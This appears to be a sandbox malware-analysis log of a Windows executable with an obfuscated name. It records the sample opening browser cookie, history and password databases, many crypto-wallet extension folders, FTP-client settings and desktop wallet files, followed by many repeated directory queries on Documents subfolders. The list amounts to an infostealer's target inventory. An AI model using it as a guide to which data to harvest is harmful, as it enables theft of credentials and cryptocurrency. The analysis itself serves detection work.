Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Directory queried: C:\Users\user\Documents\MNULNCRIYC
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
